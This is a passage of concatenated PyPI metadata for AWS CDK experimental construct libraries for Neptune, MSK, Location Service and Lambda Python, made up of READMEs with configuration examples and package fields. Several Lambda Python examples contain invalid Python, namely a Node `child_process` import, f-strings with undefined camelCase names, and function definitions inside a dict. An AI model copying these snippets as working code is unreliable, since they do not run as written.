neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, instances=2 ) ``` Additionally, it is also possible to add replicas using `DatabaseInstance` for an existing cluster. ```python replica1 = neptune.DatabaseInstance(self, "Instance", cluster=cluster, instance_type=neptune.InstanceType.R5_LARGE ) ``` ## Automatic minor version upgrades By setting `autoMinorVersionUpgrade` to true, Neptune will automatically update the engine of the entire cluster to the latest minor version after a stabilization window of 2 to 3 weeks. ```python neptune.DatabaseCluster(self, "Cluster", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, auto_minor_version_upgrade=True ) ``` You can also specify `autoMinorVersionUpgrade` to a database instance. Even within the same cluster, you can modify the `autoMinorVersionUpgrade` setting on a per-instance basis. ```python neptune.DatabaseInstance(self, "Instance", cluster=cluster, instance_type=neptune.InstanceType.R5_LARGE, auto_minor_version_upgrade=True ) ``` ## Port By default, Neptune uses port `8182`. You can override the default port by specifying the `port` property: ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, port=12345 ) ``` ## Logging Neptune supports various methods for monitoring performance and usage. One of those methods is logging 1. Neptune provides logs e.g. audit logs which can be viewed or downloaded via the AWS Console. Audit logs can be enabled using the `neptune_enable_audit_log` parameter in `ClusterParameterGroup` or `ParameterGroup` 2. Neptune provides the ability to export those logs to CloudWatch Logs ```python # Cluster parameter group with the neptune_enable_audit_log param set to 1 cluster_parameter_group = neptune.ClusterParameterGroup(self, "ClusterParams", description="Cluster parameter group", parameters={ "neptune_enable_audit_log": "1" } ) cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, # Audit logs are enabled via the clusterParameterGroup cluster_parameter_group=cluster_parameter_group, # Optionally configuring audit logs to be exported to CloudWatch Logs cloudwatch_logs_exports=[neptune.LogType.AUDIT], # Optionally set a retention period on exported CloudWatch Logs cloudwatch_logs_retention=logs.RetentionDays.ONE_MONTH ) ``` For more information on monitoring, refer to https://docs.aws.amazon.com/neptune/latest/userguide/monitoring.html. For more information on audit logs, refer to https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html. For more information on exporting logs to CloudWatch Logs, refer to https://docs.aws.amazon.com/neptune/latest/userguide/cloudwatch-logs.html. ## Metrics Both `DatabaseCluster` and `DatabaseInstance` provide a `metric()` method to help with cluster-level and instance-level monitoring. ```python # cluster: neptune.DatabaseCluster # instance: neptune.DatabaseInstance cluster.metric("SparqlRequestsPerSec") # cluster-level SparqlErrors metric instance.metric("SparqlRequestsPerSec") ``` For more details on the available metrics, refer to https://docs.aws.amazon.com/neptune/latest/userguide/cw-metrics.html ## Copy tags to snapshot By setting `copyTagsToSnapshot` to true, all tags of the cluster are copied to the snapshots when they are created. ```python cluster = neptune.DatabaseCluster(self, "Database", vpc=vpc, instance_type=neptune.InstanceType.R5_LARGE, copy_tags_to_snapshot=True ) ``` ## Neptune Serverless You can configure a Neptune Serverless cluster using the dedicated instance type along with the `serverlessScalingConfiguration` property. > Visit [Using Amazon Neptune Serverless](https://docs.aws.amazon.com/neptune/latest/userguide/neptune-serverless-using.html) for more details. ```python cluster = neptune.DatabaseCluster(self, "ServerlessDatabase", vpc=vpc, instance_type=neptune.InstanceType.SERVERLESS, serverless_scaling_configuration=neptune.ServerlessScalingConfiguration( min_capacity=1, max_capacity=5 ) ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:12.536423
aws_cdk_aws_neptune_alpha-2.239.0a0.tar.gz
132,086
a7/28/d99079aa7823245b5191998c651ba00fdf23431c7c1ecb7db2c0d18b651f/aws_cdk_aws_neptune_alpha-2.239.0a0.tar.gz
source
sdist
null
false
62e876fa1f60c558ede1722d80572ebe
e352725848740637ced6a12c095e4b06107274ae1a8a52df326663e0f5228465
a728d99079aa7823245b5191998c651ba00fdf23431c7c1ecb7db2c0d18b651f
null
[]
0
2.1
aws-cdk.aws-msk-alpha
2.239.0a0
The CDK Construct Library for AWS::MSK
# Amazon Managed Streaming for Apache Kafka Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> [Amazon MSK](https://aws.amazon.com/msk/) is a fully managed service that makes it easy for you to build and run applications that use Apache Kafka to process streaming data. The following example creates an MSK Cluster. ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc ) ``` ## Allowing Connections To control who can access the Cluster, use the `.connections` attribute. For a list of ports used by MSK, refer to the [MSK documentation](https://docs.aws.amazon.com/msk/latest/developerguide/client-access.html#port-info). ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc ) cluster.connections.allow_from( ec2.Peer.ipv4("1.2.3.4/8"), ec2.Port.tcp(2181)) cluster.connections.allow_from( ec2.Peer.ipv4("1.2.3.4/8"), ec2.Port.tcp(9094)) ``` ## Cluster Endpoints You can use the following attributes to get a list of the Kafka broker or ZooKeeper node endpoints ```python # cluster: msk.Cluster CfnOutput(self, "BootstrapBrokers", value=cluster.bootstrap_brokers) CfnOutput(self, "BootstrapBrokersTls", value=cluster.bootstrap_brokers_tls) CfnOutput(self, "BootstrapBrokersSaslScram", value=cluster.bootstrap_brokers_sasl_scram) CfnOutput(self, "BootstrapBrokerStringSaslIam", value=cluster.bootstrap_brokers_sasl_iam) CfnOutput(self, "ZookeeperConnection", value=cluster.zookeeper_connection_string) CfnOutput(self, "ZookeeperConnectionTls", value=cluster.zookeeper_connection_string_tls) ``` ## Importing an existing Cluster To import an existing MSK cluster into your CDK app use the `.fromClusterArn()` method. ```python cluster = msk.Cluster.from_cluster_arn(self, "Cluster", "arn:aws:kafka:us-west-2:1234567890:cluster/a-cluster/11111111-1111-1111-1111-111111111111-1") ``` ## Client Authentication [MSK supports](https://docs.aws.amazon.com/msk/latest/developerguide/kafka_apis_iam.html) the following authentication mechanisms. ### TLS To enable client authentication with TLS set the `certificateAuthorityArns` property to reference your ACM Private CA. [More info on Private CAs.](https://docs.aws.amazon.com/msk/latest/developerguide/msk-authentication.html) ```python import aws_cdk.aws_acmpca as acmpca # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.tls( certificate_authorities=[ acmpca.CertificateAuthority.from_certificate_authority_arn(self, "CertificateAuthority", "arn:aws:acm-pca:us-west-2:1234567890:certificate-authority/11111111-1111-1111-1111-111111111111") ] ) ) ``` ### SASL/SCRAM Enable client authentication with [SASL/SCRAM](https://docs.aws.amazon.com/msk/latest/developerguide/msk-password.html): ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl( scram=True ) ) ``` ### IAM Enable client authentication with [IAM](https://docs.aws.amazon.com/msk/latest/developerguide/iam-access-control.html): ```python # vpc: ec2.Vpc cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl( iam=True ) ) ``` ### SASL/IAM + TLS Enable client authentication with [IAM](https://docs.aws.amazon.com/msk/latest/developerguide/iam-access-control.html) as well as enable client authentication with TLS by setting the `certificateAuthorityArns` property to reference your ACM Private CA. [More info on Private CAs.](https://docs.aws.amazon.com/msk/latest/developerguide/msk-authentication.html) ```python import aws_cdk.aws_acmpca as acmpca # vpc: ec2.Vpc cluster = msk.Cluster(self, "Cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, encryption_in_transit=msk.EncryptionInTransitConfig( client_broker=msk.ClientBrokerEncryption.TLS ), client_authentication=msk.ClientAuthentication.sasl_tls( iam=True, certificate_authorities=[ acmpca.CertificateAuthority.from_certificate_authority_arn(self, "CertificateAuthority", "arn:aws:acm-pca:us-west-2:1234567890:certificate-authority/11111111-1111-1111-1111-111111111111") ] ) ) ``` ## Logging You can deliver Apache Kafka broker logs to one or more of the following destination types: Amazon CloudWatch Logs, Amazon S3, Amazon Data Firehose. To configure logs to be sent to an S3 bucket, provide a bucket in the `logging` config. ```python # vpc: ec2.Vpc # bucket: s3.IBucket cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, logging=msk.BrokerLogging( s3=msk.S3LoggingConfiguration( bucket=bucket ) ) ) ``` When the S3 destination is configured, AWS will automatically create an S3 bucket policy that allows the service to write logs to the bucket. This makes it impossible to later update that bucket policy. To have CDK create the bucket policy so that future updates can be made, the `@aws-cdk/aws-s3:createDefaultLoggingPolicy` [feature flag](https://docs.aws.amazon.com/cdk/v2/guide/featureflags.html) can be used. This can be set in the `cdk.json` file. ```json { "context": { "@aws-cdk/aws-s3:createDefaultLoggingPolicy": true } } ``` ## Storage Mode You can configure an MSK cluster storage mode using the `storageMode` property. Tiered storage is a low-cost storage tier for Amazon MSK that scales to virtually unlimited storage, making it cost-effective to build streaming data applications. > Visit [Tiered storage](https://docs.aws.amazon.com/msk/latest/developerguide/msk-tiered-storage.html) > to see the list of compatible Kafka versions and for more details. ```python # vpc: ec2.Vpc # bucket: s3.IBucket cluster = msk.Cluster(self, "cluster", cluster_name="myCluster", kafka_version=msk.KafkaVersion.V4_1_X_KRAFT, vpc=vpc, storage_mode=msk.StorageMode.TIERED ) ``` ## MSK Express Brokers You can create an MSK cluster with Express Brokers by setting the `brokerType` property to `BrokerType.EXPRESS`. Express Brokers are a low-cost option for development, testing, and workloads that don't require the high availability guarantees of standard MSK cluster. For more information, see [Amazon MSK Express Brokers](https://docs.aws.amazon.com/msk/latest/developerguide/msk-broker-types-express.html). **Note:** When using Express Brokers, the following constraints apply: * Apache Kafka version must be 3.6.x, 3.8.x, or 3.9.x * You must specify the `instanceType` * The VPC must have at least 3 subnets (across 3 AZs) * `ebsStorageInfo` is not supported * `storageMode` is not supported * `logging` is not supported * Supported broker sizes: `m7g.xlarge`, `m7g.2xlarge`, `m7g.4xlarge`, `m7g.8xlarge`, `m7g.12xlarge`, `m7g.16xlarge` ```python # vpc: ec2.Vpc express_cluster = msk.Cluster(self, "ExpressCluster", cluster_name="MyExpressCluster", kafka_version=msk.KafkaVersion.V3_8_X, vpc=vpc, broker_type=msk.BrokerType.EXPRESS, instance_type=ec2.InstanceType.of(ec2.InstanceClass.M7G, ec2.InstanceSize.XLARGE) ) ``` ## MSK Serverless You can also use MSK Serverless by using `ServerlessCluster` class. MSK Serverless is a cluster type for Amazon MSK that makes it possible for you to run Apache Kafka without having to manage and scale cluster capacity. MSK Serverless requires IAM access control for all clusters. For more infomation, see [Use MSK Serverless clusters](https://docs.aws.amazon.com/msk/latest/developerguide/serverless-getting-started.html). ```python # vpc: ec2.Vpc serverless_cluster = msk.ServerlessCluster(self, "ServerlessCluster", cluster_name="MyServerlessCluster", vpc_configs=[msk.VpcConfig(vpc=vpc) ] ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:11.569392
aws_cdk_aws_msk_alpha-2.239.0a0.tar.gz
115,411
71/da/5593a829f78b1d02949e408c5196f2fe342ff71861bf9b0b3d1a33b5b5e5/aws_cdk_aws_msk_alpha-2.239.0a0.tar.gz
source
sdist
null
false
a528f73589d2b09082624a605b68c0b2
47f203ad8b8c92785aa791db065691e6b257d25c628e65bc0e230ec9598864eb
71da5593a829f78b1d02949e408c5196f2fe342ff71861bf9b0b3d1a33b5b5e5
null
[]
0
2.1
aws-cdk.aws-location-alpha
2.239.0a0
The CDK Construct Library for AWS::Location
# AWS::Location Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project. Amazon Location Service lets you add location data and functionality to applications, which includes capabilities such as maps, points of interest, geocoding, routing, geofences, and tracking. Amazon Location provides location-based services (LBS) using high-quality data from global, trusted providers Esri and HERE. With affordable data, tracking and geofencing capabilities, and built-in metrics for health monitoring, you can build sophisticated location-enabled applications. ## Geofence Collection Geofence collection resources allow you to store and manage geofences—virtual boundaries on a map. You can evaluate locations against a geofence collection resource and get notifications when the location update crosses the boundary of any of the geofences in the geofence collection. ```python # key: kms.Key location.GeofenceCollection(self, "GeofenceCollection", geofence_collection_name="MyGeofenceCollection", # optional, defaults to a generated name kms_key=key ) ``` Use the `grant()` or `grantRead()` method to grant the given identity permissions to perform actions on the geofence collection: ```python # role: iam.Role geofence_collection = location.GeofenceCollection(self, "GeofenceCollection", geofence_collection_name="MyGeofenceCollection" ) geofence_collection.grant_read(role) ``` ## Tracker A tracker stores position updates for a collection of devices. The tracker can be used to query the devices' current location or location history. It stores the updates, but reduces storage space and visual noise by filtering the locations before storing them. For more information, see [Trackers](https://docs.aws.amazon.com/location/latest/developerguide/geofence-tracker-concepts.html#tracking-overview). To create a tracker, define a `Tracker`: ```python # key: kms.Key location.Tracker(self, "Tracker", tracker_name="MyTracker", # optional, defaults to a generated name kms_key=key ) ``` Use the `grant()`, `grantUpdateDevicePositions()` or `grantRead()` method to grant the given identity permissions to perform actions on the geofence collection: ```python # role: iam.Role tracker = location.Tracker(self, "Tracker", tracker_name="MyTracker" ) tracker.grant_read(role) ``` If you want to associate a tracker with geofence collections, define a `geofenceCollections` property or use the `addGeofenceCollections()` method. ```python # geofence_collection: location.GeofenceCollection # geofence_collection_for_add: location.GeofenceCollection # tracker: location.Tracker tracker = location.Tracker(self, "Tracker", tracker_name="MyTracker", geofence_collections=[geofence_collection] ) tracker.add_geofence_collections(geofence_collection_for_add) ``` ## API key API keys are a key value that is associated with specific Amazon Location Service resources or API in your AWS account, and specific actions that you can perform on those resources. You can use an API key in your application to make unauthenticated calls to the Amazon Location APIs for those resources. For more information, see [Use API keys to authenticate](https://docs.aws.amazon.com/location/latest/developerguide/using-apikeys.html). To create an API key, define an `ApiKey`: ```python location.ApiKey(self, "APIKeyAny", # specify allowed actions allow_maps_actions=[location.AllowMapsAction.GET_STATIC_MAP ], allow_places_actions=[location.AllowPlacesAction.GET_PLACE ], allow_routes_actions=[location.AllowRoutesAction.CALCULATE_ISOLINES ] ) ``` > Note: `ApiKey` construct only supports [Enhanced Places, Routes, and Maps](https://aws.amazon.com/blogs/aws/announcing-new-apis-for-amazon-location-service-routes-places-and-maps/) This API key grants access to AWS-managed Places, Routes, and Maps. ## Legacy Resources AWS has released new [Enhanced Places, Routes, and Maps](https://aws.amazon.com/about-aws/whats-new/2024/11/amazon-location-service-enhanced-places-routes-maps/?nc1=h_ls). Since these use AWS-managed resources, users no longer need to create Maps, Places, and Routes resources themselves. As a result, the following constructs are now considered legacy. For more information, see [developer guide](https://docs.aws.amazon.com/location/latest/developerguide/what-is.html). ### Map The Amazon Location Service Map resource gives you access to the underlying basemap data for a map. You use the Map resource with a map rendering library to add an interactive map to your application. You can add other functionality to your map, such as markers (or pins), routes, and polygon areas, as needed for your application. For information about how to use map resources in practice, see [Using Amazon Location Maps in your application](https://docs.aws.amazon.com/location/latest/developerguide/using-maps.html). To create a map, define a `Map`: ```python location.Map(self, "Map", map_name="my-map", style=location.Style.VECTOR_ESRI_NAVIGATION, custom_layers=[location.CustomLayer.POI] ) ``` Use the `grant()` or `grantRendering()` method to grant the given identity permissions to perform actions on the map: ```python # role: iam.Role map = location.Map(self, "Map", style=location.Style.VECTOR_ESRI_NAVIGATION ) map.grant_rendering(role) ``` ### Place Index A key function of Amazon Location Service is the ability to search the geolocation information. Amazon Location provides this functionality via the Place index resource. The place index includes which [data provider](https://docs.aws.amazon.com/location/latest/developerguide/what-is-data-provider.html) to use for the search. To create a place index, define a `PlaceIndex`: ```python location.PlaceIndex(self, "PlaceIndex", place_index_name="MyPlaceIndex", # optional, defaults to a generated name data_source=location.DataSource.HERE ) ``` Use the `grant()` or `grantSearch()` method to grant the given identity permissions to perform actions on the place index: ```python # role: iam.Role place_index = location.PlaceIndex(self, "PlaceIndex") place_index.grant_search(role) ``` ### Route Calculator Route calculator resources allow you to find routes and estimate travel time based on up-to-date road network and live traffic information from your chosen data provider. For more information, see [Routes](https://docs.aws.amazon.com/location/latest/developerguide/route-concepts.html). To create a route calculator, define a `RouteCalculator`: ```python location.RouteCalculator(self, "RouteCalculator", route_calculator_name="MyRouteCalculator", # optional, defaults to a generated name data_source=location.DataSource.ESRI ) ``` Use the `grant()` or `grantRead()` method to grant the given identity permissions to perform actions on the route calculator: ```python # role: iam.Role route_calculator = location.RouteCalculator(self, "RouteCalculator", data_source=location.DataSource.ESRI ) route_calculator.grant_read(role) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:10.685031
aws_cdk_aws_location_alpha-2.239.0a0.tar.gz
122,321
dc/27/29c9987d961c1920f11b289442873eb78dbf2f09ece973c8f334558a9e50/aws_cdk_aws_location_alpha-2.239.0a0.tar.gz
source
sdist
null
false
e82b76da2d6e6bba343ca2485ee31f9b
7bf1560b2ac105b07243373851d2efda7b32cb989485ed2b9b583facdfcf2a44
dc2729c9987d961c1920f11b289442873eb78dbf2f09ece973c8f334558a9e50
null
[]
0
2.1
aws-cdk.aws-lambda-python-alpha
2.239.0a0
The CDK Construct Library for AWS Lambda in Python
# Amazon Lambda Python Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This library provides constructs for Python Lambda functions. To use this module, you will need to have Docker installed. ## Python Function Define a `PythonFunction`: ```python python.PythonFunction(self, "MyFunction", entry="/path/to/my/function", # required runtime=Runtime.PYTHON_3_8, # required index="my_index.py", # optional, defaults to 'index.py' handler="my_exported_func" ) ``` All other properties of `lambda.Function` are supported, see also the [AWS Lambda construct library](https://github.com/aws/aws-cdk/tree/main/packages/aws-cdk-lib/aws-lambda). ## Python Layer You may create a python-based lambda layer with `PythonLayerVersion`. If `PythonLayerVersion` detects a `requirements.txt` or `Pipfile` or `poetry.lock` with the associated `pyproject.toml` at the entry path, then `PythonLayerVersion` will include the dependencies inline with your code in the layer. Define a `PythonLayerVersion`: ```python python.PythonLayerVersion(self, "MyLayer", entry="/path/to/my/layer" ) ``` A layer can also be used as a part of a `PythonFunction`: ```python python.PythonFunction(self, "MyFunction", entry="/path/to/my/function", runtime=Runtime.PYTHON_3_8, layers=[ python.PythonLayerVersion(self, "MyLayer", entry="/path/to/my/layer" ) ] ) ``` ## Packaging If `requirements.txt`, `Pipfile`, `uv.lock` or `poetry.lock` exists at the entry path, the construct will handle installing all required modules in a [Lambda compatible Docker container](https://gallery.ecr.aws/sam/build-python3.13) according to the `runtime` and with the Docker platform based on the target architecture of the Lambda function. Python bundles are only recreated and published when a file in a source directory has changed. Therefore (and as a general best-practice), it is highly recommended to commit a lockfile with a list of all transitive dependencies and their exact versions. This will ensure that when any dependency version is updated, the bundle asset is recreated and uploaded. To that end, we recommend using [`pipenv`], [`uv`] or [`poetry`] which have lockfile support. * [`pipenv`](https://pipenv-fork.readthedocs.io/en/latest/basics.html#example-pipfile-lock) * [`poetry`](https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control) * [`uv`](https://docs.astral.sh/uv/concepts/projects/sync/#exporting-the-lockfile) Packaging is executed using the `Packaging` class, which: 1. Infers the packaging type based on the files present. 2. If it sees a `Pipfile`, `uv.lock` or a `poetry.lock` file, it exports it to a compatible `requirements.txt` file with credentials (if they're available in the source files or in the bundling container). 3. Installs dependencies using `pip` or `uv`. 4. Copies the dependencies into an asset that is bundled for the Lambda package. **Lambda with a requirements.txt** ```plaintext . ├── lambda_function.py # exports a function named 'handler' ├── requirements.txt # has to be present at the entry path ``` **Lambda with a Pipfile** ```plaintext . ├── lambda_function.py # exports a function named 'handler' ├── Pipfile # has to be present at the entry path ├── Pipfile.lock # your lock file ``` **Lambda with a poetry.lock** ```plaintext . ├── lambda_function.py # exports a function named 'handler' ├── pyproject.toml # your poetry project definition ├── poetry.lock # your poetry lock file has to be present at the entry path ``` **Lambda with a uv.lock** Reference: https://docs.astral.sh/uv/concepts/projects/layout/ ```plaintext . ├── lambda_function.py # exports a function named 'handler' ├── pyproject.toml # your poetry project definition ├── uv.lock # your uv lock file has to be present at the entry path ├── .python-version # this file is ignored, python version is configured via Runtime ``` **Excluding source files** You can exclude files from being copied using the optional bundling string array parameter `assetExcludes`: ```python python.PythonFunction(self, "function", entry="/path/to/poetry-function", runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( # translates to `rsync --exclude='.venv'` asset_excludes=[".venv"] ) ) ``` **Including hashes** You can include hashes in `poetry` using the optional boolean parameter `poetryIncludeHashes`: ```python python.PythonFunction(self, "function", entry="/path/to/poetry-function", runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( poetry_include_hashes=True ) ) ``` **Excluding URLs** You can exclude URLs in `poetry` using the optional boolean parameter `poetryWithoutUrls`: ```python python.PythonFunction(self, "function", entry="/path/to/poetry-function", runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( poetry_without_urls=True ) ) ``` ## Custom Bundling Custom bundling can be performed by passing in additional build arguments that point to index URLs to private repos, or by using an entirely custom Docker images for bundling dependencies. The build args currently supported are: * `PIP_INDEX_URL` * `PIP_EXTRA_INDEX_URL` * `HTTPS_PROXY` Additional build args for bundling that refer to PyPI indexes can be specified as: ```python entry = "/path/to/function" image = DockerImage.from_build(entry) python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( build_args={"PIP_INDEX_URL": "https://your.index.url/simple/", "PIP_EXTRA_INDEX_URL": "https://your.extra-index.url/simple/"} ) ) ``` If using a custom Docker image for bundling, the dependencies are installed with `pip`, `pipenv` or `poetry` by using the `Packaging` class. A different bundling Docker image that is in the same directory as the function can be specified as: ```python entry = "/path/to/function" image = DockerImage.from_build(entry) python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions(image=image) ) ``` You can set additional Docker options to configure the build environment: ```python from aws_cdk import DockerVolume entry = "/path/to/function" python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( network="host", security_opt="no-new-privileges", user="user:group", volumes_from=["777f7dc92da7"], volumes=[DockerVolume(host_path="/host-path", container_path="/container-path")] ) ) ``` ## Custom Bundling with Code Artifact To use a Code Artifact PyPI repo, the `PIP_INDEX_URL` for bundling the function can be customized (requires AWS CLI in the build environment): ```python from child_process import exec_sync entry = "/path/to/function" image = DockerImage.from_build(entry) domain = "my-domain" domain_owner = "111122223333" repo_name = "my_repo" region = "us-east-1" code_artifact_auth_token = exec_sync(f"aws codeartifact get-authorization-token --domain {domain} --domain-owner {domainOwner} --query authorizationToken --output text").to_string().trim() index_url = f"https://aws:{codeArtifactAuthToken}@{domain}-{domainOwner}.d.codeartifact.{region}.amazonaws.com/pypi/{repoName}/simple/" python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( environment={"PIP_INDEX_URL": index_url} ) ) ``` The index URL or the token are only used during bundling and thus not included in the final asset. Setting only environment variable for `PIP_INDEX_URL` or `PIP_EXTRA_INDEX_URL` should work for accessing private Python repositories with `pip`, `pipenv` and `poetry` based dependencies. If you also want to use the Code Artifact repo for building the base Docker image for bundling, use `buildArgs`. However, note that setting custom build args for bundling will force the base bundling image to be rebuilt every time (i.e. skip the Docker cache). Build args can be customized as: ```python from child_process import exec_sync entry = "/path/to/function" image = DockerImage.from_build(entry) domain = "my-domain" domain_owner = "111122223333" repo_name = "my_repo" region = "us-east-1" code_artifact_auth_token = exec_sync(f"aws codeartifact get-authorization-token --domain {domain} --domain-owner {domainOwner} --query authorizationToken --output text").to_string().trim() index_url = f"https://aws:{codeArtifactAuthToken}@{domain}-{domainOwner}.d.codeartifact.{region}.amazonaws.com/pypi/{repoName}/simple/" python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( build_args={"PIP_INDEX_URL": index_url} ) ) ``` ## Command hooks It is possible to run additional commands by specifying the `commandHooks` prop: ```python entry = "/path/to/function" python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( command_hooks={ # run tests def before_bundling(self, input_dir): return ["pytest"], def after_bundling(self, input_dir): return ["pylint"] } ) ) ``` The following hooks are available: * `beforeBundling`: runs before all bundling commands * `afterBundling`: runs after all bundling commands They all receive the directory containing the dependencies file (`inputDir`) and the directory where the bundled asset will be output (`outputDir`). They must return an array of commands to run. Commands are chained with `&&`. The commands will run in the environment in which bundling occurs: inside the container for Docker bundling or on the host OS for local bundling. ## Docker based bundling in complex Docker configurations By default the input and output of Docker based bundling is handled via bind mounts. In situations where this does not work, like Docker-in-Docker setups or when using a remote Docker socket, you can configure an alternative, but slower, variant that also works in these situations. ```python entry = "/path/to/function" python.PythonFunction(self, "function", entry=entry, runtime=Runtime.PYTHON_3_8, bundling=python.BundlingOptions( bundling_file_access=BundlingFileAccess.VOLUME_COPY ) ) ``` ## Troubleshooting ### Containerfile: no such file or directory If you are on a Mac, using [Finch](https://github.com/runfinch/finch) instead of Docker, and see an error like this: ```txt lstat /private/var/folders/zx/d5wln9n10sn0tcj1v9798f1c0000gr/T/jsii-kernel-9VYgrO/node_modules/@aws-cdk/aws-lambda-python-alpha/lib/Containerfile: no such file or directory ``` That is a sign that your temporary directory has not been mapped into the Finch VM. Add the following to `~/.finch/finch.yaml`: ```yaml additional_directories: - path: /private/var/folders/ - path: /var/folders/ ``` Then restart the Finch VM by running `finch vm stop && finch vm start`.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
